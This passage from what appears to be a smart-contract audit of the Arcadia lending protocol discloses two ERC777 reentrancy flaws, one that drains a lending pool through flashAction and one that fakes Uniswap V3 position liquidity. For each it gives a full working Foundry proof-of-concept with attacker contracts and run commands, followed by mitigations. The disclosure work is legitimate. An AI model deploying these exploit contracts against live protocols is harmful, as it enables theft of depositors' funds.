this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nTo finish the setup, replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nFor the actual proof of concept, create a `Poc.t.sol` file in `test/fuzz/LendingPool` and paste the following code. 
The code contains the proof of concept test, as well as the action target implementation:\\n/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from "./_LendingPool.fuzz.t.sol";\\n\\nimport { ActionData, IActionBase } from "../../../lib/accounts-v2/src/interfaces/IActionBase.sol";\\nimport { IPermit2 } from "../../../lib/accounts-v2/src/interfaces/IPermit2.sol";\\n\\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test {\\n\\n /////////////////////////////////////////////////////////////////\\n // TEST CONTRACTS //\\n /////////////////////////////////////////////////////////////////\\n\\n ActionHandler internal actionHandler;\\n bytes internal callData;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy action handler\\n vm.prank(users.creatorAddress);\\n actionHandler = new ActionHandler(address(liquidator), address(proxyAccount));\\n\\n // Set origination fee\\n vm.prank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer some tokens to actiontarget to perform liquidation repayment and approve tokens to be transferred to pool \\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(actionHandler), 1 ether);\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n // Deposit 100 erc777 tokens into pool\\n vm.startPrank(address(srTranche));\\n pool.depositInLendingPool(100 ether, users.liquidityProvider);\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 ether);\\n\\n // Approve creditor from actiontarget for bid payment\\n vm.startPrank(address(actionHandler));\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. \\n /// Prerequisites:\\n /// - Create an actionTarget contract that will trigger the attack flow using the ERC777 callback when receiving the \\n /// borrowed funds in the flash action.\\n /// - Have some liquidity deposited in the pool in order to be able to borrow it\\n /// Attack:\\n /// 1. Open a margin account in the creditor to be exploited.\\n /// 2. Deposit a small amount of collateral. This amount needs to be big enough to cover the `minUsdValue` configured\\n /// in the registry for the given creditor.\\n /// 3. Create the `actionData` for the account's `flashAction()` function. The data contained in it (withdrawData, transferFromOwnerData,\\n /// permit, signature and actionTargetData) can be empty, given that such data is not required for the attack.\\n /// 4. Trigger LendingPool.flashAction(). The execution flow will:\\n /// a. Mint the flash-actioned debt to the account\\n /// b. Send the borrowed funds to the action target\\n /// c. The action target will execute the ERC777 `tokensReceived()` callback, which will:\\n /// - Trigger Liquidator.liquidateAccount(), which will set the account in an auction state\\n /// - Trigger Liquidator.bid(). 
\\n \\n function testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open a margin account\\n vm.startPrank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit 1 stable token in the account as collateral.\\n // Note: The creditors's `minUsdValue` is set to 1 * 10 ** 18. Because\\n // value is converted to an 18-decimal number and the asset is pegged to 1 dollar,\\n // depositing an amount of 1 * 10 ** 6 is the actual minimum usd amount so that the \\n // account's collateral value is not considered as 0.\\n depositTokenInAccount(proxyAccount, mockERC20.stable1, 1 * 10 ** 6);\\n assertEq(proxyAccount.getCollateralValue(), 1 * 10 ** 18);\\n\\n //---------- STEP 3 ----------//\\n // Create empty action data. The action handler won't withdraw/deposit any asset from the account \\n // when the `flashAction()` callback in the account is triggered. Hence, action data will contain empty elements.\\n callData = _buildActionData();\\n\\n // Fetch balances from the action handler (who will receive all the borrowed funds from the flash action)\\n // as well as the pool. \\n // Action handler balance initially has 1 token of `token777` (given initially on deployment)\\n assertEq(mockERC20.token777.balanceOf(address(actionHandler)), 1 * 10 ** 18);\\n uint256 liquidityPoolBalanceBefore = mockERC20.token777.balanceOf(address(pool));\\n uint256 actionHandlerBalanceBefore = mockERC20.token777.balanceOf(address(actionHandler));\\n // Pool initially has 100 tokens of `token777` (deposited by the liquidity provider in setUp())\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 * 10 ** 18);\\n\\n //---------- STEP 4 ----------//\\n // Step 4. 
Trigger the flash action.\\n vm.startPrank(users.accountOwner);\\n\\n pool.flashAction(100 ether , address(proxyAccount), address(actionHandler), callData, emptyBytes3);\\n vm.stopPrank();\\n \\n \\n //---------- FINAL ASSERTIONS ----------//\\n\\n // Action handler (who is the receiver of the borrowed funds in the flash action) has succesfully obtained 100 tokens from \\n //the pool, and in the end it has nearly 101 tokens (initially it had 1 token, plus the 100 tokens stolen \\n // from the pool minus the small amount required to pay for the bid)\\n assertGt(mockERC20.token777.balanceOf(address(actionHandler)), 100 * 10 ** 18);\\n\\n // On the other hand, pool has lost nearly all of its balance, only remaining the small amount paid from the \\n // action handler in order to bid\\n assertLt(mockERC20.token777.balanceOf(address(pool)), 0.05 * 10 ** 18);\\n \\n } \\n\\n /// @notice Internal function to build the `actionData` payload needed to execute the `flashActionByCreditor()` \\n /// callback when requesting a flash action\\n function _buildActionData() internal returns(bytes memory) {\\n ActionData memory emptyActionData;\\n address[] memory to;\\n bytes[] memory data;\\n bytes memory actionTargetData = abi.encode(emptyActionData, to, data);\\n IPermit2.PermitBatchTransferFrom memory permit;\\n bytes memory signature;\\n return abi.encode(emptyActionData, emptyActionData, permit, signature, actionTargetData);\\n }\\n}\\n\\n/// @notice ERC777Recipient interface\\ninterface IERC777Recipient {\\n \\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\n /// @notice Liquidator interface\\ninterface ILiquidator {\\n function liquidateAccount(address account) external;\\n function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external;\\n}\\n\\n /// @notice actionHandler contract that will trigger the attack via ERC777's `tokensReceived()` callback\\ncontract ActionHandler is IERC777Recipient, IActionBase {\\n\\n ILiquidator public immutable liquidator;\\n address public immutable account;\\n uint256 triggered;\\n\\n constructor(address _liquidator, address _account) {\\n liquidator = ILiquidator(_liquidator);\\n account = _account;\\n } \\n\\n /// @notice ERC777 callback function\\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Only trigger the callback once (avoid triggering it while receiving funds in the setup + when receiving final funds)\\n if(triggered == 1) {\\n triggered = 2;\\n liquidator.liquidateAccount(account);\\n uint256[] memory askedAssetAmounts = new uint256[](1);\\n askedAssetAmounts[0] = 1; // only ask for 1 wei of token so that we repay a small share of the debt\\n liquidator.bid(account, askedAssetAmounts, true);\\n }\\n unchecked{\\n triggered++;\\n }\\n }\\n\\n function executeAction(bytes calldata actionTargetData) external returns (ActionData memory) {\\n ActionData memory data;\\n return data;\\n }\\n\\n}\\nExecute the proof of concept with the following command (being inside the `lending-v2` folder): `forge test --mt testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds`
This attack is possible because the `getCollateralValue()` function returns a 0 collateral value due to the `minUsdValue` mentioned before not being reached after executing the bid. The Liquidator's `_settleAuction()` function then believes that the collateral held in the account is 0.\\nIn order to mitigate the issue, consider fetching the actual collateral value inside `_settleAuction()` even when it is below the creditor's configured `minUsdValue`, so that the function can properly check whether the full collateral was sold or not.\\n```\\n// Liquidator.sol\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // rest of code\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue(); // <----- Fetch the REAL collateral value instead of reducing it to 0 if `minUsdValue` is not reached\\n \\n \\n // rest of code\\n }\\n```\\n
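To make the recommendation concrete, the sketch below shows one possible shape of the change. The `getCollateralValueWithoutFloor()` helper is hypothetical (it does not exist in the current codebase) and would return the raw USD value of the remaining collateral without zeroing it out below `minUsdValue`:\\n```\\n// Liquidator.sol (sketch)\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // rest of code\\n\\n // Hypothetical view that skips the minUsdValue floor, so dust collateral is not reported as 0.\\n uint256 collateralValue = IAccount(account).getCollateralValueWithoutFloor();\\n uint256 usedMargin = IAccount(account).getUsedMargin();\\n\\n if (collateralValue >= usedMargin || usedMargin == minimumMargin) {\\n ILendingPool(creditor).settleLiquidationHappyFlow(account, startDebt, minimumMargin, msg.sender);\\n } else if (collateralValue == 0) {\\n // Only reached when the collateral is truly gone, not when it merely dipped below minUsdValue.\\n ILendingPool(creditor).settleLiquidationUnhappyFlow(account, startDebt, minimumMargin, msg.sender);\\n }\\n // rest of code\\n }\\n```\\n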
The impact for this vulnerability is high. All funds deposited in creditors with ERC777 tokens as the underlying asset can be drained.
```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of "price" in "Numeraire" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a "transferFrom" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n
Caching Uniswap position liquidity allows borrowing using undercollateralized Uni positions
high
It is possible to fake the amount of liquidity held in a Uniswap V3 position, making the protocol believe the Uniswap position has more liquidity than the actual liquidity deposited in the position. This makes it possible to borrow using undercollateralized Uniswap positions.\\nWhen depositing into an account, the `deposit()` function is called, which calls the internal `_deposit()` function. Depositing is performed in two steps:\\nThe registry's `batchProcessDeposit()` function is called. This function checks if the deposited assets can be priced, and in case that a creditor is set, it also updates the exposures and underlying assets for the creditor.\\nThe assets are transferred and deposited into the account.\\n```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n\\nFor Uniswap positions (and assuming that a creditor is set), calling `batchProcessDeposit()` will internally trigger the UniswapV3AM.processDirectDeposit():\\n```\\n// UniswapV3AM.sol\\n\\nfunction processDirectDeposit(address creditor, address asset, uint256 assetId, uint256 amount)\\n public\\n override\\n returns (uint256 recursiveCalls, uint256 assetType)\\n {\\n // Amount deposited of a Uniswap V3 LP can be either 0 or 1 (checked in the Account).\\n // For uniswap V3 every id is a unique asset -> on every deposit the asset must added to the Asset Module.\\n if (amount == 1) _addAsset(assetId);\\n\\n // rest of code\\n }\\n```\\n\\nThe Uniswap position will then be added to the protocol using the internal `_addAsset()` function. One of the most important actions performed inside this function is to store the liquidity that the Uniswap position has in that moment. 
Such liquidity is obtained from directly querying the NonfungiblePositionManager contract:\\n```\\nfunction _addAsset(uint256 assetId) internal {\\n // rest of code\\n\\n (,, address token0, address token1,,,, uint128 liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n\\n // No need to explicitly check if token0 and token1 are allowed, _addAsset() is only called in the\\n // deposit functions and there any deposit of non-allowed Underlying Assets will revert.\\n if (liquidity == 0) revert ZeroLiquidity();\\n\\n // The liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner,\\n // the max exposure checks could otherwise be circumvented.\\n assetToLiquidity[assetId] = liquidity;\\n\\n // rest of code\\n }\\n```\\n\\nAs the snippet shows, the liquidity is stored in a mapping because “Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.”. From this point forward, and until the Uniswap position is withdrawn from the account, the collateral value (i.e. the amount that the position is worth) will be computed utilizing the `_getPosition()` internal function, which will read the cached liquidity value stored in the `assetToLiquidity[assetId]` mapping, rather than directly consulting the NonfungiblePositionManager contract. This way, the position won't be able to surpass the max exposures:\\n```\\n// UniswapV3AM.sol\\n\\nfunction _getPosition(uint256 assetId)\\n internal\\n view\\n returns (address token0, address token1, int24 tickLower, int24 tickUpper, uint128 liquidity)\\n {\\n // For deposited assets, the liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.\\n liquidity = uint128(assetToLiquidity[assetId]);\\n\\n if (liquidity > 0) {\\n (,, token0, token1,, tickLower, tickUpper,,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n } else {\\n // Only used as an off-chain view function by getValue() to return the value of a non deposited Liquidity Position.\\n (,, token0, token1,, tickLower, tickUpper, liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n }\\n }\\n```\\n\\nHowever, storing the liquidity leads to an attack vector that allows a Uniswap position's liquidity to be completely withdrawn while making the protocol believe that the Uniswap position is still full.\\nAs mentioned at the beginning of the report, the deposit process is done in two steps: processing assets in the registry and transferring the actual assets to the account. Because processing assets in the registry is the step where the Uniswap position's liquidity is cached, a malicious depositor can use an ERC777 hook in the transferring process to withdraw the liquidity in the Uniswap position.\\nThe following steps show how the attack could be performed:\\nInitially, a malicious contract must be created. 
This contract will be the one holding the assets and depositing them into the account, and will also be able to trigger the ERC777's `tokensToSend()` hook.\\nThe malicious contract will call the account's `deposit()` function with two `assetAddresses` to be deposited: the first asset must be an ERC777 token, and the second asset must be the Uniswap position.\\n`IRegistry(registry).batchProcessDeposit()` will then execute. This is the first of the two steps taking place to deposit assets, where the liquidity from the Uniswap position will be fetched from the NonFungiblePositionManager and stored in the `assetToLiquidity[assetId]` mapping.\\nAfter processing the assets, the transferring phase will start. The first asset to be transferred will be the ERC777 token. This will trigger the `tokensToSend()` hook in our malicious contract. At this point, our contract is still the owner of the Uniswap position (the Uniswap position won't be transferred until the ERC777 transfer finishes), so the liquidity in the Uniswap position can be decreased inside the hook triggered in the malicious contract. This leaves the Uniswap position with a smaller liquidity amount than the one stored in the `batchProcessDeposit()` step, making the protocol believe that the liquidity stored in the position is the one that the position had prior to starting the attack.\\nFinally, and following the transfer of the ERC777 token, the Uniswap position will be transferred and succesfully deposited in the account. Arcadia will believe that the account has a Uniswap position worth some liquidity, when in reality the Uni position will be empty.\\nProof of Concept\\nThis proof of concept show show the previous attack can be performed so that the liquidity in the uniswap position is 0, while the collateral value for the account is far greater than 0.\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import "../utils/mocks/tokens/ERC777Mock.sol"; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock token4;\\n ERC777Mock token777; // <----- Add this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nNext step is to replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nCreate a `PocUniswap.t.sol` file in `lending-v2/test/fuzz/LendingPool/PocUniswap.t.sol` and paste the 
following code snippet into it:\\n`/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from "./_LendingPool.fuzz.t.sol";\\n\\nimport { IPermit2 } from "../../../lib/accounts-v2/src/interfaces/IPermit2.sol";\\nimport { UniswapV3AM_Fuzz_Test, UniswapV3Fixture, UniswapV3AM, IUniswapV3PoolExtension, TickMath } from "../../../lib/accounts-v2/test/fuzz/asset-modules/UniswapV3AM/_UniswapV3AM.fuzz.t.sol";\\nimport { ERC20Mock } from "../../../lib/accounts-v2/test/utils/mocks/tokens/ERC20Mock.sol";\\n\\nimport "forge-std/console.sol";\\n\\ninterface IERC721 {\\n function ownerOf(uint256 tokenid) external returns(address);\\n function approve(address spender, uint256 tokenId) external;\\n}\\n \\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test { \\n\\n /////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n /////////////////////////////////////////////////////////////////\\n int24 private MIN_TICK = -887_272;\\n int24 private MAX_TICK = -MIN_TICK;\\n\\n /////////////////////////////////////////////////////////////////\\n // STORAGE //\\n /////////////////////////////////////////////////////////////////\\n AccountOwner public accountOwnerContract;\\n ERC20Mock token0;\\n ERC20Mock token1;\\n uint256 tokenId;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override(LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test) {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy fixture for Uniswap.\\n UniswapV3Fixture.setUp();\\n\\n deployUniswapV3AM(address(nonfungiblePositionManager));\\n\\n vm.startPrank(users.riskManager);\\n registryExtension.setRiskParametersOfDerivedAM(\\n address(pool), address(uniV3AssetModule), type(uint112).max, 100\\n );\\n \\n token0 = mockERC20.token1;\\n token1 = mockERC20.token2;\\n (token0, token1) = token0 < token1 ? (token0, token1) : (token1, token0);\\n\\n // Deploy account owner\\n accountOwnerContract = new AccountOwner(address(nonfungiblePositionManager));\\n\\n \\n // Set origination fee\\n vm.startPrank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer ownership to Account Owner \\n vm.startPrank(users.accountOwner);\\n factory.safeTransferFrom(users.accountOwner, address(accountOwnerContract), address(proxyAccount));\\n vm.stopPrank();\\n \\n\\n // Mint uniswap position underlying tokens to accountOwnerContract\\n mockERC20.token1.mint(address(accountOwnerContract), 100 ether);\\n mockERC20.token2.mint(address(accountOwnerContract), 100 ether);\\n\\n // Open Uniswap position \\n tokenId = _openUniswapPosition();\\n \\n\\n // Transfer some ERC777 tokens to accountOwnerContract. These will be used to be deposited as collateral into the account\\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(accountOwnerContract), 1 ether);\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. 
\\n function testVuln_borrowUsingUndercollateralizedUniswapPosition(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open margin account setting pool as new creditor\\n vm.startPrank(address(accountOwnerContract));\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit assets into account. The order of the assets to be deposited is important. The first asset will be an ERC777 token that triggers the callback on transferring.\\n // The second asset will be the uniswap position.\\n\\n address[] memory assetAddresses = new address[](2);\\n assetAddresses[0] = address(mockERC20.token777);\\n assetAddresses[1] = address(nonfungiblePositionManager);\\n uint256[] memory assetIds = new uint256[](2);\\n assetIds[0] = 0;\\n assetIds[1] = tokenId;\\n uint256[] memory assetAmounts = new uint256[](2);\\n assetAmounts[0] = 1; // no need to send more than 1 wei as the ERC777 only serves to trigger the callback\\n assetAmounts[1] = 1;\\n // Set approvals\\n IERC721(address(nonfungiblePositionManager)).approve(address(proxyAccount), tokenId);\\n mockERC20.token777.approve(address(proxyAccount), type(uint256).max);\\n\\n // Perform deposit. \\n // Deposit will perform two steps:\\n // 1. processDeposit(): this step will handle the deposited assets and verify everything is correct. For uniswap positions, the liquidity in the position\\n // will be stored in the `assetToLiquidity` mapping.\\n // 2.Transferring the assets: after processing the assets, the actual asset transfers will take place. First, the ER777 colallateral will be transferred. \\n // This will trigger the callback in the accountOwnerContract (the account owner), which will withdraw all the uniswap position liquidity. Because the uniswap \\n // position liquidity has been cached in step 1 (processDeposit()), the protocol will still believe that the uniswap position has some liquidity, when in reality\\n // all the liquidity from the position has been withdrawn in the ERC777 `tokensToSend()` callback. \\n proxyAccount.deposit(assetAddresses, assetIds, assetAmounts);\\n\\n //---------- FINAL ASSERTIONS ----------//\\n // Collateral value fetches the `assetToLiquidity` value cached prior to removing position liquidity. 
This does not reflect that the position is empty,\\n // hence it is possible to borrow with an empty uniswap position.\\n uint256 finalCollateralValue = proxyAccount.getCollateralValue();\\n\\n // Liquidity in the position is 0.\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(tokenId); \\n\\n console.log("Collateral value of account:", finalCollateralValue);\\n console.log("Actual liquidity in position", liquidity);\\n\\n assertEq(liquidity, 0);\\n assertGt(finalCollateralValue, 1000 ether); // Collateral value is greater than 1000\\n } \\n\\n function _openUniswapPosition() internal returns(uint256 tokenId) {\\n vm.startPrank(address(accountOwnerContract));\\n \\n uint160 sqrtPriceX96 = uint160(\\n calculateAndValidateRangeTickCurrent(\\n 10 * 10**18, // priceToken0\\n 20 * 10**18 // priceToken1\\n )\\n );\\n\\n // Create Uniswap V3 pool initiated at tickCurrent with cardinality 300.\\n IUniswapV3PoolExtension uniswapPool = createPool(token0, token1, TickMath.getSqrtRatioAtTick(TickMath.getTickAtSqrtRatio(sqrtPriceX96)), 300);\\n\\n // Approve liquidity\\n mockERC20.token1.approve(address(uniswapPool), type(uint256).max);\\n mockERC20.token2.approve(address(uniswapPool), type(uint256).max);\\n\\n // Mint liquidity position.\\n uint128 liquidity = 100 * 10**18;\\n tokenId = addLiquidity(uniswapPool, liquidity, address(accountOwnerContract), MIN_TICK, MAX_TICK, false);\\n \\n assertEq(IERC721(address(nonfungiblePositionManager)).ownerOf(tokenId), address(accountOwnerContract));\\n }\\n \\n}\\n\\n/// @notice ERC777Sender interface\\ninterface IERC777Sender {\\n /**\\n * @dev Called by an {IERC777} token contract whenever a registered holder's\\n * (`from`) tokens are about to be moved or destroyed. 
The type of operation\\n * is conveyed by `to` being the zero address or not.\\n *\\n * This call occurs _before_ the token contract's state is updated, so\\n * {IERC777-balanceOf}, etc., can be used to query the pre-operation state.\\n *\\n * This function may revert to prevent the operation from being executed.\\n */\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\ninterface INonfungiblePositionManager {\\n function positions(uint256 tokenId)\\n external\\n view\\n returns (\\n uint96 nonce,\\n address operator,\\n address token0,\\n address token1,\\n uint24 fee,\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n uint256 feeGrowthInside0LastX128,\\n uint256 feeGrowthInside1LastX128,\\n uint128 tokensOwed0,\\n uint128 tokensOwed1\\n );\\n\\n struct DecreaseLiquidityParams {\\n uint256 tokenId;\\n uint128 liquidity;\\n uint256 amount0Min;\\n uint256 amount1Min;\\n uint256 deadline;\\n }\\n function decreaseLiquidity(DecreaseLiquidityParams calldata params)\\n external\\n payable\\n returns (uint256 amount0, uint256 amount1);\\n}\\n\\n /// @notice AccountOwner contract that will trigger the attack via ERC777's `tokensToSend()` callback\\ncontract AccountOwner is IERC777Sender {\\n\\n INonfungiblePositionManager public nonfungiblePositionManager;\\n\\n constructor(address _nonfungiblePositionManager) {\\n nonfungiblePositionManager = INonfungiblePositionManager(_nonfungiblePositionManager);\\n }\\n\\n function tokensToSend(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Remove liquidity from Uniswap position\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n uint128 liquidity,\\n ,\\n ,\\n ,\\n ) = nonfungiblePositionManager.positions(1); // tokenId 1\\n\\n INonfungiblePositionManager.DecreaseLiquidityParams memory params = INonfungiblePositionManager.DecreaseLiquidityParams({\\n tokenId: 1,\\n liquidity: liquidity,\\n amount0Min: 0,\\n amount1Min: 0,\\n deadline: block.timestamp\\n });\\n nonfungiblePositionManager.decreaseLiquidity(params);\\n }\\n \\n\\n function onERC721Received(address, address, uint256, bytes calldata) public pure returns (bytes4) {\\n return bytes4(abi.encodeWithSignature("onERC721Received(address,address,uint256,bytes)"));\\n }\\n\\n}`\\nExecute the following command being inside the `lending-v2` folder: `forge test --mt testVuln_borrowUsingUndercollateralizedUniswapPosition -vvvvv`.\\nNOTE: It is possible that you find issues related to code not being found. This is because the Uniswap V3 deployment uses foundry's `vm.getCode()` and we are importing the deployment file from the `accounts-v2` repo to the `lending-v2` repo, which makes foundry throw some errors. To fix this, just compile the contracts in the `accounts-v2` repo and copy the missing folders from the `accounts-v2/out` generated folder into the `lending-v2/out` folder.
There are several ways to mitigate this issue. One option is to transfer each asset at the same time it is processed when depositing, instead of first processing all assets (and caching the Uniswap liquidity) and only then transferring them. Another option is to perform a liquidity check after the Uniswap position has actually been deposited, ensuring that the liquidity cached in the `assetToLiquidity[assetId]` mapping matches the liquidity returned by the NonfungiblePositionManager.
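\\nA minimal sketch of the second option, assuming a hypothetical `verifyLiquidity()` view is added to `UniswapV3AM` and invoked by the Account (or the Registry) once the ERC721 transfer has completed (the error name is illustrative):\\n```\\n// UniswapV3AM.sol (sketch)\\n\\nerror LiquidityMismatch();\\n\\n/// @notice Hypothetical post-transfer check: the liquidity cached during processDirectDeposit()\\n/// must still match the liquidity currently reported by the NonfungiblePositionManager.\\nfunction verifyLiquidity(uint256 assetId) external view {\\n (,,,,,,, uint128 currentLiquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n if (currentLiquidity != assetToLiquidity[assetId]) revert LiquidityMismatch();\\n}\\n```\\nCalling such a check at the end of `AccountV1._deposit()` would make the attack revert, since the liquidity removed inside the ERC777 hook would no longer match the cached value.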
High. The protocol will always believe that there is liquidity deposited in the Uniswap position while in reality the position is empty. This allows for undercollateralized borrows, essentially enabling the protocol to be drained if the attack is performed utilizing several uniswap positions.
